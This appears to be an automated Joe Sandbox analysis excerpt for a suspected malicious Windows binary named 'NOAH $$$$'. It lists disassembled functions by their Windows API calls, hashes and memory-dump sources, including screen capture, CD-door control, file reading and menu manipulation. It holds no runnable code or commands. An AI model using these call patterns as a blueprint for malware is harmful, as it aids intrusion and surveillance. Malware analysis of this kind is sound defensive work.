                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 1153243558-438819550
                                                                                                                                        • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                                        • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                                                                        • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                                        • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsicoll
                                                                                                                                        • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                                        • API String ID: 3832890014-4202584635
                                                                                                                                        • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                                        • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                                                                        • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                                        • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                                                                        APIs
                                                                                                                                        • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                                                        • GetFocus.USER32 ref: 0046A0DD
                                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost$CtrlFocus
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 1534620443-4108050209
                                                                                                                                        • Opcode ID: 69f57c1da7d99aaf19a54cb3f0377e1430f34c496c45dabe130679879bb200d9
                                                                                                                                        • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                                                        • Opcode Fuzzy Hash: 69f57c1da7d99aaf19a54cb3f0377e1430f34c496c45dabe130679879bb200d9
                                                                                                                                        • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CreateDestroy
                                                                                                                                        • String ID: ,$tooltips_class32
                                                                                                                                        • API String ID: 1109047481-3856767331
                                                                                                                                        • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                        • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                                                        • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                        • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                                                        APIs
                                                                                                                                        • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                                                        • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                                                        • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                                                        • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                                                        • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                                                        • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                                                        • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                                                        • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                                                        • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 1441871840-4108050209
                                                                                                                                        • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                                                                                        • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                                                        • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                                                                                        • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                                        • __swprintf.LIBCMT ref: 00460915
                                                                                                                                        • __swprintf.LIBCMT ref: 0046092D
                                                                                                                                        • _wprintf.LIBCMT ref: 004609E1
                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                        • API String ID: 3631882475-2268648507
                                                                                                                                        • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                                        • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                                                        • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                                        • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                                                        APIs
                                                                                                                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                                                                        • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                                                                        • SendMessageW.USER32 ref: 00471740
                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                                                                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                                                                        • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                                                                        • SendMessageW.USER32 ref: 0047184F
                                                                                                                                        • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                                                                        • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4116747274-0
                                                                                                                                        • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                                        • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                                                        • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                                        • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                                                        APIs
                                                                                                                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                                                        • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                                                        • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoItemMenu$Sleep
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 1196289194-4108050209
                                                                                                                                        • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                                                                                        • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                                                                        • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                                                                                        • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 0043143E
                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                                                        • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                                        • String ID: (
                                                                                                                                        • API String ID: 3300687185-3887548279
                                                                                                                                        • Opcode ID: 603e6b3e37746ec9058b96d14af227772b21f97dc715e72dc47e988551ca64b1
                                                                                                                                        • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                                                        • Opcode Fuzzy Hash: 603e6b3e37746ec9058b96d14af227772b21f97dc715e72dc47e988551ca64b1
                                                                                                                                        • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                        • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                        • API String ID: 1976180769-4113822522
                                                                                                                                        • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                                        • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                                                        • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                                        • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 461458858-0
                                                                                                                                        • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                                        • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                                                                        • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                                        • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                                                        • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3969911579-0
                                                                                                                                        • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                                        • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                                                        • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                                        • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
